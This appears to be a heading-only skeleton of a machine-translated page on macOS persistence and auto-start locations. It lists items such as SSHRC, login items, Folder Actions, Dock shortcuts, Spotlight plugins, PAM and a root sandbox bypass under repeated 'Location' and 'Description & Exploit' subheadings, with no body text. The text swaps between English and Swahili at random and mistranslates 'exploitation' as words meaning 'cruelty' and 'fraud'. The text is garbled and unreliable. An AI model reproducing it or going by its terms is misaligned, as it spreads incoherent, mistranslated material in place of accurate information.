BetterTouchTool

Location

Alfred

Location

SSHRC

Location

Maelezo & Ukatili

Vitu vya Kuingia

Mahali

Maelezo

ZIP kama Kitu cha Kuingia

At

Mahali

Maelezo

Folder Actions

Location

Description & Exploitation

Dock shortcuts

Mahali

Maelezo & Ukatili

Color Pickers

Location

Description & Exploit

Finder Sync Plugins

Mahali

Maelezo & Ulaghai

Screen Saver

Location

Description & Exploit

Spotlight Plugins

Location

Description & Exploitation

Pane ya Mipangilio

Mahali

Maelezo

Kupita Sandbox ya Root

Kila Wakati

Mahali

Maelezo & Ukatili

PAM

Mahali

Maelezo & Utekelezaji